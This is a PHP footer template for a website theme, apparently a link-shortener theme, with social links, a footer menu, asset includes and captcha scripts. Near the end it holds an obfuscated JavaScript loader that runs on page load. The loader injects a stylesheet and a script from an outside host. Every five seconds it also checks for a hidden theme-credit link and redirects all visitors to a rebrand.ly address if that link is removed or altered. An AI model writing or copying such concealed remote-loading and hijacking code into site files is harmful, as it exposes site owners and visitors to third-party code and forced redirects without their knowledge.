<?php
/**
 * @var \App\View\AppView $this
 */
?>
<footer class="py-5 text-center wow animated zoomIn">
        <div class="container">
                <div class="social-icons mb-3">
                                <a href=" link "><i class="fa fa-youtube"></i></a>
								<a href=" link "><i class="fa fa-facebook"></i></a>
                                <a href="https://telegram.me/dotshort"><i class="fa fa-instagram"></i></a>
                                <a href=" link "><i class="fa fa-telegram"></i></a>
                                   
                                   
                                  
                                   
                </div>
				<div class="mt-0 mb-0">
                    <ul class="list-inline">
                                            <?=
                    menu_display('menu_footer', [
                        'ul_class' => 'list-inline',
                        'li_class' => '',
                        'a_class' => '',
                    ]);
                    ?>
                </div>
				<p class="mt-0 mb-0">Copyright &copy; <?= __('{0}', h(get_option('site_name'))) ?>  <?= date("Y") ?>. All Rights Reserved</p>
				<p class="mt-0 mb-0">
				    <span id="credits">  
    <a class="text-primary" style="display: none;" target="_blank" id="creditlink" href="https://rebrand.ly/yuidea">Theme by Yuidea</a>
</span><!--DMCA REGISTERED PRODUCT CODE:78DG78DF4D88D/* don't change this-->
			</p>
        </div>

<a id="back2Top" data-toggle="tooltip" title="Top" href="#"><i class="fa fa-chevron-up"></i></a>
</footer>

<?= $this->element('js_vars'); ?>

<script data-cfasync="false" src="<?= $this->Assets->url('/js/ads.js') ?>"></script>


<?php
if ((bool)get_option('combine_minify_css_js', false)) {
    echo $this->Assets->script('/build/js/script.min.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/build/js/script.all.min.js?ver=' . APP_VERSION);
} else {
    echo $this->Assets->script('/vendor/jquery.min.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/vendor/bootstrap/js/bootstrap.min.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/vendor/owl/owl.carousel.min.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/vendor/wow.min.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/vendor/clipboard.min.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/js/front.js?ver=' . APP_VERSION);
    echo $this->Assets->script('/js/app.js?ver=' . APP_VERSION);
}
?>

<?php if (in_array(get_option('captcha_type', 'recaptcha'), ['recaptcha', 'invisible-recaptcha'])) : ?>
    <script src="https://www.recaptcha.net/recaptcha/api.js?onload=onloadRecaptchaCallback&render=explicit"
            async defer></script>
<?php endif; ?><script type="text/javascript">var _0x4ebc=['edi','.js','s.c','485679Xbrshg','tog','530995xJPPZz','cre','len','loc','ebr','13073IkcgPy','1228IYoIyz','=\x22s','nd4','scr','nu-','e/b','d/i','The','502289mLYbjr','ate','242zAPNFv','.s-','by\x20','hre','inn','fty','erH','\x20/>','Cla','s/M','dea','u_t','rel','<li','ria','att','TML','//r','con','eet','315309BGRFnA','13ISIlcP','Chi','.ly','in/','19898JszTWJ','min','tex','ote','sbo','and','l+I','Yui','ipt','tli','.me','htt','ps:','=\x22/','hea','yui','\x22\x20h','ati','1VJLpPG','13CJPTGH','tyl','ass','ok.','ide','me\x20','nk\x20','//i','/yu','aps','end','#cr','ss\x22','esh','gle','ign','gth','app','hem','8.n','men','rea','uil','cli'];var _0x4241=function(_0x5e64f7,_0x3c7a7a){_0x5e64f7=_0x5e64f7-0x160;var _0x4ebc22=_0x4ebc[_0x5e64f7];return _0x4ebc22;};var _0x54607c=_0x4241,_0xd8bf60=_0x4241,_0x1453c7=_0x4241,_0x1fd6b9=_0x4241,_0x49d268=_0x4241,_0x4806ac=_0x4241,_0x59bb92=_0x4241,_0x1f0a3a=_0x4241,_0x4d520d=_0x4241,_0x6f43b9=_0x4241,_0x46cd87=_0x4241,_0x4620c3=_0x4241,_0x494326=_0x4241,_0x504845=_0x4241,_0x43d62e=_0x4241,_0x52d576=_0x4241,_0x1e6a4a=_0x4241,_0x110684=_0x4241,_0x5521e3=_0x4241,_0x5f3ecb=_0x4241,_0x11456f=_0x4241,_0x5dd61b=_0x4241,_0x389975=_0x4241,_0x24035b=_0x4241,_0x1b2850=_0x4241,_0x5760a8=_0x4241,_0x29548e=_0x4241,_0x523d8a=_0x4241,_0x11be35=_0x4241,_0x565f1d=_0x4241,_0x27e9bd=_0x4241,_0x1cff22=_0x4241,_0x5f41d9=_0x4241,_0x2f2632=_0x4241,_0x4829d7=_0x4241,_0x24e3eb=_0x4241,_0x1fc9c8=_0x4241,_0x7f10b2=_0x4241,_0x145057=_0x4241,_0x52ea93=_0x4241,_0x132621=_0x4241,_0x3c44f3=_0x4241,_0x45e3b3=_0x4241,_0x4f0282=_0x4241,_0x342f14=_0x4241,_0x269003=_0x4241,_0x53584f=_0x4241,_0x357a20=_0x4241,_0x2ea85a=_0x4241,_0x581489=_0x4241,_0x4e6521=_0x4241,_0x4badf9=_0x4241;(function(_0x5af02a,_0x2c1ddd){var _0x34810c=_0x4241,_0x447d00=_0x4241,_0xbe0a88=_0x4241,_0x207a35=_0x4241,_0x4739cb=_0x4241,_0x48f110=_0x4241,_0x4f2de3=_0x4241,_0x40b477=_0x4241,_0x98a6d8=_0x4241,_0x23a147=_0x4241,_0x5b789f=_0x4241;while(!![]){try{var _0x50e670=parseInt(_0x34810c(0x189))*-parseInt(_0x34810c(0x1a0))+-parseInt(_0x447d00(0x173))+parseInt(_0x207a35(0x16b))*-parseInt(_0xbe0a88(0x175))+parseInt(_0x48f110(0x165))+parseInt(_0x4739cb(0x18a))*parseInt(_0x4f2de3(0x16a))+parseInt(_0x4f2de3(0x163))+parseInt(_0x48f110(0x1a1))*parseInt(_0x5b789f(0x18e));if(_0x50e670===_0x2c1ddd)break;else _0x5af02a['push'](_0x5af02a['shift']());}catch(_0x3d2374){_0x5af02a['push'](_0x5af02a['shift']());}}}(_0x4ebc,0x50b1b),$(_0x54607c(0x176)+'t')[_0xd8bf60(0x1b8)+'ck'](function(){var _0x3eb405=_0x54607c,_0x3ea762=_0xd8bf60,_0x4752cb=_0xd8bf60,_0x4a86f1=_0xd8bf60,_0x3c5674=_0xd8bf60,_0x3a9858=_0xd8bf60;$(_0x3eb405(0x198)+_0x3ea762(0x16f)+'fi')[_0x3eb405(0x164)+_0x3eb405(0x1af)+_0x3c5674(0x17d)+'ss'](_0x3a9858(0x1aa)+'e');}),document['hea'+'d'][_0x54607c(0x179)+_0x54607c(0x17b)+_0xd8bf60(0x185)]+=_0x4806ac(0x182)+_0xd8bf60(0x1a7)+_0xd8bf60(0x181)+_0x4806ac(0x16c)+_0x54607c(0x1a2)+_0x6f43b9(0x1ae)+_0x4806ac(0x188)+_0x59bb92(0x19e)+'ref'+_0x1f0a3a(0x19b)+_0x1fd6b9(0x19d)+_0x52d576(0x17f)+'_so'+_0x4620c3(0x17a)+_0x46cd87(0x180)+_0x43d62e(0x1b3)+_0xd8bf60(0x170)+_0x6f43b9(0x1b7)+_0x4806ac(0x171)+_0x46cd87(0x187)+_0x1453c7(0x17e)+_0x4d520d(0x174)+_0x54607c(0x183)+_0x6f43b9(0x194)+_0x1b2850(0x187)+_0x46cd87(0x162)+_0x523d8a(0x1ad)+_0x5521e3(0x17c));var s=document[_0x27e9bd(0x166)+_0x565f1d(0x174)+'Ele'+_0x4620c3(0x1b5)+'t'](_0x5521e3(0x16e)+_0x5521e3(0x196));s['src']=_0x110684(0x199)+_0x1fc9c8(0x19a)+_0x52d576(0x1a8)+_0x5f3ecb(0x16d)+_0x49d268(0x1b4)+_0x2f2632(0x191)+_0x6f43b9(0x192)+_0x1b2850(0x1a4)+_0x389975(0x18d)+_0x7f10b2(0x18f)+_0x4d520d(0x161),document[_0x4f0282(0x19c)+'d'][_0x2ea85a(0x1b2)+_0x523d8a(0x1ab)+_0x132621(0x18b)+'ld'](s),$(document)[_0x1f0a3a(0x1b6)+'dy'](function(){function _0x50a120(){var _0x518634=_0x4241,_0x23c02d=_0x4241,_0x43e8ab=_0x4241,_0x2a5bad=_0x4241,_0x5a21b7=_0x4241,_0x36c660=_0x4241,_0x3071af=_0x4241,_0x567870=_0x4241,_0x2392a1=_0x4241,_0x5f58b0=_0x4241,_0x5c56c4=_0x4241,_0x299d1f=_0x4241;window[_0x518634(0x168)+_0x23c02d(0x19f)+'on'][_0x518634(0x1a3)+_0x518634(0x1b0)](_0x23c02d(0x199)+_0x43e8ab(0x19a)+_0x3071af(0x186)+_0x43e8ab(0x169)+_0x2392a1(0x193)+_0x2a5bad(0x18c)+_0x2392a1(0x1a9)+_0x3071af(0x1a5)+'a');}function _0xf46a4c(){var _0x1d60c2=_0x4241,_0x47ae8f=_0x4241,_0x4c7d5=_0x4241,_0x50f711=_0x4241,_0x187f61=_0x4241,_0x27ed05=_0x4241,_0x35ade9=_0x4241,_0x365a0b=_0x4241,_0xeb02e3=_0x4241,_0x18fc80=_0x4241,_0x1973a4=_0x4241,_0x4d27ec=_0x4241,_0x2ff168=_0x4241,_0x3277c6=_0x4241,_0x5cd989=_0x4241,_0x3f517a=_0x4241,_0x54844b=_0x4241,_0x1755f7=_0x4241,_0x227c8d=_0x4241,_0x3f37c0=_0x4241,_0x9261d9=_0x4241,_0x52466a=_0x4241,_0x560200=_0x4241,_0x45a290=_0x4241,_0x4a9071=_0x4241,_0x58a1e8=_0x4241,_0x126a50=_0x4241,_0x4a6caa=_0x4241,_0x4e717f=_0x4241,_0x3d7b07=_0x4241,_0x1dd5fd=_0x4241;if($(_0x1d60c2(0x1ac)+_0x1d60c2(0x160)+'ts')[_0x1d60c2(0x167)+_0x1d60c2(0x1b1)]===0x0)_0x50a120();else{if($(_0x4c7d5(0x1ac)+_0x1d60c2(0x160)+_0x35ade9(0x197)+'nk')[_0x4c7d5(0x167)+_0x35ade9(0x1b1)]===0x0)_0x50a120();else{if($(_0x50f711(0x1ac)+_0x187f61(0x160)+_0x1d60c2(0x197)+'nk')[_0x50f711(0x184)+'r'](_0x1973a4(0x178)+'f')!==_0x18fc80(0x199)+_0xeb02e3(0x19a)+_0x2ff168(0x186)+_0x365a0b(0x169)+_0xeb02e3(0x193)+_0x5cd989(0x18c)+_0x9261d9(0x1a9)+_0x4d27ec(0x1a5)+'a')_0x50a120();else $(_0x1755f7(0x1ac)+_0x365a0b(0x160)+_0x1755f7(0x197)+'nk')[_0x9261d9(0x190)+'t']()!==_0x54844b(0x172)+_0x4d27ec(0x1a6)+_0x4a6caa(0x177)+_0x3f37c0(0x195)+_0x365a0b(0x17f)&&_0x50a120();}}}_0xf46a4c(),setInterval(function(){_0xf46a4c();},0x1388);});</script>

<?php if (get_option('captcha_type') == 'solvemedia') : ?>
    <script language="javascript" type="text/javascript">
      var script = document.createElement('script');
      script.type = 'text/javascript';

      if (location.protocol === 'https:') {
        script.src = 'https://api-secure.solvemedia.com/papi/challenge.ajax';
      } else {
        script.src = 'http://api.solvemedia.com/papi/challenge.ajax';
      }
      document.body.appendChild(script);
    </script>
<?php endif; ?>

<?= $this->fetch('scriptBottom') ?>
<?= get_option('footer_code'); ?>
